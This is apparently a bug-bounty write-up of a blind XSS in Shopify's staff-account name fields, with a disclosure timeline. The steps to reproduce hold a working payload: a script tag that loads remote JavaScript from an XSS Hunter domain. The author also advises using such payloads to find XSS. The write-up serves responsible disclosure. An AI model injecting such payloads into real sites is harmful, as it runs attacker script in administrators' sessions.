First, I want to thank apapedulimu for allowing me to make my first write up on this blog
I’m rioncool22, based on North Sumatera, Indonesia
I want to share to you about my finding in shopify.com (Hackerone Program). I very often do bug searches on the shopify site and submit reports but it always ends with Informative and N/A. But, one day i read a report from the Hactivity about blind XSS. The payload get executed at unexpected place. After that, I tried it on shopify and the payload got fired in admin panel 😀
Step to reproduce :
- Go to https://your-store.myshopify.com/admin/settings/account
- Add Staff Account
- Fill First & Last Name with this payload “><script>$.getScript(“//xsshunterdomain”)</script>
- XSS fired in Admin Panel
Some tips : If you search XSS Bug, Change your payload with XSS Hunter payload, because you will not know where the payload get fired 😀
Timeline :
- Aug 1 : Submit Report to Shopify
- Aug 4 : First respone from Shopify
- Aug 5 : Triaged
- Aug 6 : Resolved & Rewarded $$$$
- Aug 19 : Public Disclosure
Get in touch with me on :
- Hackerone : Click Here
- Twitter : Click Here